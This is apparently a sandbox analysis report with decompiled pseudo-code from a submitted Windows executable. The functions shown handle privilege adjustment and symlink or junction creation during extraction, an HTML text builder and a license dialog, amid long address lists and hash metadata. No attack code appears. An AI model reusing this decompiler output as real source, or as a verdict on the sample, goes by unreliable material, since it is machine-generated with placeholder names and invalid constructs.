                0x003f336a
                0x003f336a
                0x003f336d
                0x003f3374
                0x003f3374
                0x003f3377
                0x003f337a
                0x003f3381
                0x003f3381
                0x003f3384
                0x003f338b
                0x003f338d
                0x003f338d
                0x003f3386
                0x003f3386
                0x003f3389
                0x00000000
                0x00000000
                0x003f3389
                0x003f337c
                0x003f337c
                0x003f337f
                0x00000000
                0x00000000
                0x003f337f
                0x003f336f
                0x003f336f
                0x003f3372
                0x00000000
                0x00000000
                0x003f3372
                0x003f338e
                0x003f333a
                0x003f333a
                0x003f333a
                0x003f333d
                0x003f333d
                0x003f333f
                0x003f3341
                0x00000000
                0x00000000
                0x003f3343
                0x003f3345
                0x003f3359
                0x003f3359
                0x003f3347
                0x003f3347
                0x003f334a
                0x003f334d
                0x00000000
                0x003f334f
                0x003f334f
                0x003f3352
                0x003f3355
                0x003f3357
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f3357
                0x003f334d
                0x003f3362
                0x003f3362
                0x003f3364
                0x00000000
                0x003f3366
                0x003f3366
                0x003f3366
                0x00000000
                0x003f3364
                0x003f335d
                0x003f335f
                0x003f335f
                0x00000000
                0x003f335f
                0x003f332c
                0x003f332c
                0x003f332f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f332f
                0x003f332a
                0x003f3322
                0x003f3395
                0x003f3399
                0x003f3399
                0x003f2e6b
                0x003f2e6b
                0x003f2e74
                0x003f2f71
                0x003f2f71
                0x003f2f74
                0x00000000
                0x003f2ea3
                0x003f2ea3
                0x003f2ea5
                0x003f2ea8
                0x00000000
                0x003f2eae
                0x003f2eae
                0x003f2eb3
                0x003f2eb6
                0x003f316a
                0x003f316e
                0x003f2ebc
                0x003f2ec1
                0x003f2ec4
                0x003f2ec9
                0x003f2ed0
                0x003f2ed5
                0x00000000
                0x003f2edb
                0x003f2ee1
                0x003f2f0d
                0x003f2f0d
                0x003f2f12
                0x003f2f15
                0x003f2f79
                0x003f2f79
                0x003f2f7c
                0x003f2f7f
                0x003f2f81
                0x003f2f84
                0x003f2f87
                0x003f2f8d
                0x003f3139
                0x003f3139
                0x003f313c
                0x00000000
                0x003f313e
                0x003f313e
                0x003f3141
                0x00000000
                0x003f3147
                0x003f3147
                0x003f314a
                0x003f314d
                0x003f314e
                0x003f314f
                0x003f3152
                0x003f3153
                0x003f3156
                0x003f3157
                0x003f315c
                0x00000000
                0x003f315c
                0x003f3141
                0x003f2f93
                0x003f2f93
                0x003f2f97
                0x00000000
                0x003f2f9d
                0x003f2f9d
                0x003f2fa4
                0x003f2fbc
                0x003f2fbc
                0x003f2fbf
                0x003f2fc2
                0x003f2fc8
                0x003f2fd8
                0x003f2fdd
                0x003f2fe0
                0x003f2fe3
                0x003f2fe6
                0x003f2fe9
                0x003f2fec
                0x003f2fef
                0x003f2ff5
                0x003f2ff5
                0x003f2ff8
                0x003f2ffb
                0x003f300a
                0x003f300b
                0x003f300b
                0x003f300d
                0x003f3010
                0x003f3016
                0x003f3019
                0x003f301f
                0x003f3021
                0x003f3024
                0x003f3027
                0x003f302d
                0x003f3030
                0x003f3035
                0x003f3035
                0x003f3038
                0x003f303b
                0x003f303e
                0x003f3041
                0x003f3044
                0x003f3049
                0x003f304a
                0x003f304b
                0x003f304c
                0x003f304d
                0x003f3050
                0x003f3053
                0x003f3055
                0x00000000
                0x003f3057
                0x003f3057
                0x003f3057
                0x003f3058
                0x003f305a
                0x003f305d
                0x003f305e
                0x003f3063
                0x003f3066
                0x003f3068
                0x00000000
                0x00000000
                0x003f306a
                0x003f306d
                0x003f306e
                0x003f3071
                0x003f3073
                0x00000000
                0x003f3075
                0x003f3075
                0x003f3078
                0x00000000
                0x003f3078
                0x00000000
                0x003f3073
                0x003f308c
                0x003f3092
                0x003f30af
                0x003f30b4
                0x003f30b4
                0x003f30b7
                0x003f30b7
                0x00000000
                0x003f307b
                0x003f307b
                0x003f307c
                0x003f307f
                0x003f3082
                0x003f3085
                0x003f3085
                0x00000000
                0x003f308a
                0x003f3027
                0x003f3019
                0x003f30ba
                0x003f30bd
                0x003f30be
                0x003f30c1
                0x003f30c4
                0x003f30c7
                0x003f30ca
                0x003f30ca
                0x003f30d3
                0x003f30d6
                0x003f30d6
                0x003f2fef
                0x003f30d9
                0x003f30dd
                0x003f30df
                0x003f30e2
                0x003f30e8
                0x003f30e8
                0x003f30f0
                0x003f30f5
                0x003f315f
                0x003f315f
                0x003f3164
                0x003f3168
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f30f7
                0x003f30fa
                0x003f30fd
                0x003f3101
                0x003f310f
                0x003f3111
                0x003f3128
                0x003f312c
                0x003f3132
                0x003f3133
                0x003f3135
                0x00000000
                0x003f3137
                0x00000000
                0x003f3137
                0x00000000
                0x00000000
                0x00000000
                0x003f3103
                0x003f3103
                0x003f3105
                0x00000000
                0x003f3107
                0x003f3107
                0x003f310b
                0x00000000
                0x003f310d
                0x003f3113
                0x003f3118
                0x003f311b
                0x003f3120
                0x003f3123
                0x00000000
                0x003f3123
                0x003f310b
                0x003f3105
                0x003f3101
                0x003f2fa6
                0x003f2fa6
                0x003f2fad
                0x00000000
                0x003f2faf
                0x003f2faf
                0x003f2fb6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f2fb6
                0x003f2fad
                0x003f2fa4
                0x003f2f97
                0x003f2f17
                0x003f2f1f
                0x003f2f22
                0x003f2f27
                0x003f2f2b
                0x003f2f2e
                0x003f2f34
                0x003f2f37
                0x00000000
                0x003f2f39
                0x003f2f39
                0x003f2f3c
                0x003f2f3e
                0x003f316f
                0x003f316f
                0x00000000
                0x003f2f44
                0x003f2f4c
                0x003f2f57
                0x00000000
                0x00000000
                0x003f2f60
                0x003f2f63
                0x003f2f64
                0x003f2f67
                0x003f2f69
                0x00000000
                0x003f2f6f
                0x00000000
                0x003f2f6f
                0x00000000
                0x003f2f69
                0x003f2f44
                0x003f3174
                0x003f3174
                0x003f3176
                0x003f3177
                0x003f317e
                0x003f3181
                0x003f318f
                0x003f3194
                0x003f3199
                0x003f319c
                0x003f31a1
                0x003f31a4
                0x003f31a7
                0x003f31a9
                0x003f31ab
                0x003f31ab
                0x003f31b0
                0x003f31bc
                0x003f31c2
                0x003f31c7
                0x003f31ca
                0x003f31cb
                0x00000000
                0x003f31cb
                0x003f2f37
                0x003f2f04
                0x003f2f04
                0x003f2f07
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f2f07
                0x003f2ee1
                0x003f2ed5
                0x003f2eb6
                0x003f2ea8
                0x003f2e74

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 322700389-393685449
                • Opcode ID: 1a84a9255d7efa1bb5dc0cbbc28156e7ee53d84785c4e19ac28a6a2617a8649d
                • Instruction ID: 35bb05738e96f0356ee0810ffe722e440bdbd2d3300a0f0eb1b29219ba63d9cd
                • Opcode Fuzzy Hash: 1a84a9255d7efa1bb5dc0cbbc28156e7ee53d84785c4e19ac28a6a2617a8649d
                • Instruction Fuzzy Hash: 2CB1477190020DEFCF2AEFA4C8819BFBBB5BF14310F15416AEA156B212DB35DA51CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E003D6FA5(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E003EEB78(0x40279e, _t253);
				E003EEC50(0x30a8);
				if( *0x411023 == 0) {
					E003D7A9C(L"SeRestorePrivilege");
					E003D7A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0x411023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E003D13BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E003E0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E003F3E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E003F6088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E003F6088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E003F6066(_t199, _t236);
				_t112 = E003F3E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L12:
					E003DA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E003DA231(_t200) != 0) {
						_t186 = E003DA28F(E003DA243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E003DA1E0();
						} else {
							E003DA18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L21;
						}
						_t201 = 0;
						E003D2021(__eflags, 0x14, 0, _t200);
						E003D6D83(0x411098, 9);
						goto L42;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L21:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L27:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E003F6066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E003F6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L28:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E003D9556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E003D7A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E003D9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E003D9620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E003DA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E003D959A(_t253 - 0x30b4);
											goto L42;
										}
										CloseHandle(_t239);
										E003D2021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L33:
											__eflags = E003E07BC();
											if(__eflags == 0) {
												E003D15C6(_t253 - 0x7c, 0x18);
												E003E15FE(_t253 - 0x7c);
											}
											L35:
											E003D6DCB(0x411098, __eflags);
											E003D6D83(0x411098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											goto L38;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L35;
										}
										goto L33;
									}
									E003D6C23(_t200);
									E003D6D83(0x411098, 9);
									goto L38;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L38;
								}
								goto L27;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E003F6066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E003F6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L28;
						}
						E003D6C23(_t200);
						goto L38;
					}
				} else {
					if( *(_t253 - 0xd) != 0) {
						L38:
						_t201 = 0;
						L42:
						E003D15FB(_t253 - 0x2c);
						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
						return _t201;
					}
					_t190 = E003DBCC3(_t244 + 0x1104);
					_t269 = _t190;
					if(_t190 != 0) {
						goto L38;
					}
					_push(_t244 + 0x1104);
					_push(_t200);
					_push(_t244 + 0x28);
					_push(_t237);
					if(E003D7861(_t269) == 0) {
						goto L38;
					}
					goto L12;
				}
			}







































                0x003d6faa
                0x003d6fb4
                0x003d6fc0
                0x003d6fc7
                0x003d6fd1
                0x003d6fd6
                0x003d6fd6
                0x003d6fe5
                0x003d6fe8
                0x003d6fed
                0x003d6ff0
                0x003d7007
                0x003d701a
                0x003d701d
                0x003d7025
                0x003d7031
                0x003d7036
                0x003d703b
                0x003d703e
                0x003d7043
                0x003d7045
                0x003d7045
                0x003d704d
                0x003d7057
                0x003d705c
                0x003d7061
                0x003d7065
                0x003d7066
                0x003d706d
                0x003d7073
                0x003d7073
                0x003d7061
                0x003d7078
                0x003d7084
                0x003d7089
                0x003d708f
                0x003d7092
                0x003d709c
                0x003d70d6
                0x003d70e1
                0x003d70ee
                0x003d70f7
                0x003d70fc
                0x003d70ff
                0x003d7108
                0x003d7101
                0x003d7101
                0x003d7101
                0x003d70ff
                0x003d7114
                0x003d71e1
                0x003d71e3
                0x00000000
                0x00000000
                0x003d71ea
                0x003d71ef
                0x003d71fb
                0x00000000
                0x003d7127
                0x003d7139
                0x003d7142
                0x003d7155
                0x003d715b
                0x003d715b
                0x003d7161
                0x003d7164
                0x003d7205
                0x003d7208
                0x003d7213
                0x003d7216
                0x003d7219
                0x003d721f
                0x003d7222
                0x003d7228
                0x003d722b
                0x003d7239
                0x003d723f
                0x003d724d
                0x003d7255
                0x003d7258
                0x003d725f
                0x003d7274
                0x003d7280
                0x003d7280
                0x003d7283
                0x003d7286
                0x003d729e
                0x003d72a0
                0x003d72a3
                0x003d72de
                0x003d72e0
                0x003d735d
                0x003d7369
                0x003d736d
                0x003d7372
                0x003d7375
                0x003d7386
                0x003d7399
                0x003d73ac
                0x003d73b7
                0x003d73c2
                0x003d73c7
                0x003d73ce
                0x003d73d4
                0x003d73d4
                0x003d73df
                0x003d73e1
                0x00000000
                0x003d73e1
                0x003d72e3
                0x003d72ee
                0x003d72f3
                0x003d72f9
                0x003d72fc
                0x003d7305
                0x003d730a
                0x003d730c
                0x003d7313
                0x003d731b
                0x003d731b
                0x003d7320
                0x003d7327
                0x003d7330
                0x003d7335
                0x003d7338
                0x003d7339
                0x003d7340
                0x003d734a
                0x003d7342
                0x003d7342
                0x003d7342
                0x00000000
                0x003d7340
                0x003d72fe
                0x003d7303
                0x00000000
                0x00000000
                0x00000000
                0x003d7303
                0x003d72ad
                0x003d72b6
                0x00000000
                0x003d72b6
                0x003d720a
                0x003d720d
                0x00000000
                0x00000000
                0x00000000
                0x003d720d
                0x003d716d
                0x003d7170
                0x003d7176
                0x003d7179
                0x003d717f
                0x003d7182
                0x003d7190
                0x003d7196
                0x003d71a4
                0x003d71ac
                0x003d71af
                0x003d71b6
                0x003d71cb
                0x00000000
                0x003d71d0
                0x003d714a
                0x00000000
                0x003d714a
                0x003d709e
                0x003d70a2
                0x003d7350
                0x003d7350
                0x003d73e6
                0x003d73e9
                0x003d73f6
                0x003d73fe
                0x003d73fe
                0x003d70af
                0x003d70b4
                0x003d70b6
                0x00000000
                0x00000000
                0x003d70c2
                0x003d70c3
                0x003d70c7
                0x003d70c8
                0x003d70d0
                0x00000000
                0x00000000
                0x00000000
                0x003d70d0

                APIs
                • __EH_prolog.LIBCMT ref: 003D6FAA
                • _wcslen.LIBCMT ref: 003D7013
                • _wcslen.LIBCMT ref: 003D7084
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3122303884-3508440684
                • Opcode ID: 572109fd0cde811a77f6c4c59ea89ede1dd419349182f8c918ec5acab9bcfbc6
                • Instruction ID: 8cfe209a7f87c5b936990e7d556a198e63cc737a29639dece20af04043277664
                • Opcode Fuzzy Hash: 572109fd0cde811a77f6c4c59ea89ede1dd419349182f8c918ec5acab9bcfbc6
                • Instruction Fuzzy Hash: 0641F6B2D087447AEB23EB70AD42FEE776C9F04344F004557FA55AB3C2E774AA448661
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E003E9711(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				void* _t29;
				intOrPtr* _t36;
				void* _t43;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t68;
				long _t70;
				void* _t72;
				void* _t73;

				_t58 = __edx;
				_t42 = _t43;
				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t72 + 0x18));
				 *((char*)(_t72 + 0x13)) = E003E95AA(_t60);
				_push(0x200 + E003F3E13(_t60) * 2);
				_t24 = E003F3E33(_t43);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E003F6066(_t64, L"<html>");
				E003F7686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E003F7686(_t64, L"utf-8\"></head>");
				_t73 = _t72 + 0x18;
				_t68 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E003E1FDD(_t77, _t68, L"<html>", 6);
					 *((char*)(_t73 + 0x12)) = _t29 == 0;
					if(_t29 == 0) {
						_t60 = _t68 + 0xc;
					}
					E003F7686(_t64, _t60);
					if( *((char*)(_t73 + 0x1a)) == 0) {
						E003F7686(_t64, L"</html>");
					}
					_t81 =  *((char*)(_t73 + 0x13));
					if( *((char*)(_t73 + 0x13)) == 0) {
						_push(_t64);
						_t64 = E003E9955(_t58, _t81);
					}
					_t70 = 9 + E003F3E13(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t70);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L003F3E2E(_t64);
					_t24 =  *0x433180(_t62, 1, _t73 + 0x14);
					if(_t24 >= 0) {
						E003E95EB( *((intOrPtr*)(_t42 + 0x10)));
						_t36 =  *((intOrPtr*)(_t73 + 0x10));
						 *0x403278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t68 = _t68 + 2;
					_t77 =  *_t68 - _t28;
				} while ( *_t68 == _t28);
				goto L4;
			}


















                0x003e9711
                0x003e9714
                0x003e971a
                0x003e985f
                0x003e985f
                0x003e9720
                0x003e9727
                0x003e9732
                0x003e9742
                0x003e9743
                0x003e9748
                0x003e974e
                0x003e985a
                0x00000000
                0x003e985b
                0x003e975b
                0x003e9766
                0x003e9771
                0x003e9776
                0x003e9779
                0x003e977d
                0x003e9781
                0x003e978c
                0x003e9794
                0x003e979b
                0x003e97a2
                0x003e97a4
                0x003e97a4
                0x003e97a9
                0x003e97b5
                0x003e97bd
                0x003e97c3
                0x003e97c4
                0x003e97c9
                0x003e97cb
                0x003e97d3
                0x003e97d3
                0x003e97df
                0x003e97eb
                0x003e97ef
                0x003e97f9
                0x003e980e
                0x003e981b
                0x003e9810
                0x003e9810
                0x003e9815
                0x003e9815
                0x003e980e
                0x003e981f
                0x003e982d
                0x003e9836
                0x003e9841
                0x003e9846
                0x003e9852
                0x003e9858
                0x003e9858
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e9783
                0x003e9783
                0x003e9783
                0x003e9786
                0x003e9786
                0x00000000

                APIs
                • _wcslen.LIBCMT ref: 003E9736
                • _wcslen.LIBCMT ref: 003E97D6
                • GlobalAlloc.KERNEL32(00000040,?), ref: 003E97E5
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 003E9806
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 1116704506-4209811716
                • Opcode ID: 583be0e60b49bced00b9e8244e037ffb43ee8450805a90d43e2131061afdb927
                • Instruction ID: 3946e03e25633dd8b48cf60f3cc6ce5451a9d66bb7de16a1b39cd139b9c5de89
                • Opcode Fuzzy Hash: 583be0e60b49bced00b9e8244e037ffb43ee8450805a90d43e2131061afdb927
                • Instruction Fuzzy Hash: 34312A321083657AD727AF269C06F6F779C9F92310F15021FF601AA1D2EB749A0983A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E003EB5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E003D1316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E003ED69E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0x427b7c;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0x42ec84;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x42fc9c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0x4330c4(0xf));
					 *0x4330c0(_t34);
					_t30 =  *0x418444; // 0x0
					E003E9ED5(_t30, __eflags,  *0x41102c, _t37,  *0x42fc98, 0, 0);
					L003F3E2E( *0x42fc9c);
					L003F3E2E( *0x42fc98);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}














                0x003eb5c0
                0x003eb5c1
                0x003eb5c7
                0x003eb5ce
                0x003eb5e7
                0x003eb6d3
                0x003eb6d5
                0x00000000
                0x003eb6d5
                0x003eb5ed
                0x003eb5f3
                0x003eb620
                0x003eb625
                0x003eb62a
                0x003eb62c
                0x003eb637
                0x003eb637
                0x003eb63d
                0x003eb642
                0x003eb644
                0x003eb650
                0x003eb650
                0x003eb656
                0x003eb65b
                0x003eb65d
                0x003eb661
                0x003eb661
                0x003eb676
                0x003eb67e
                0x003eb694
                0x003eb69b
                0x003eb6a1
                0x003eb6b6
                0x003eb6c1
                0x003eb6cc
                0x00000000
                0x003eb6d2
                0x003eb5f8
                0x003eb607
                0x00000000
                0x003eb607
                0x003eb5fd
                0x003eb600
                0x003eb61b
                0x003eb60f
                0x003eb610
                0x00000000
                0x003eb610
                0x003eb605
                0x003eb60e
                0x00000000
                0x003eb60e
                0x00000000

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EB610
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 003EB637
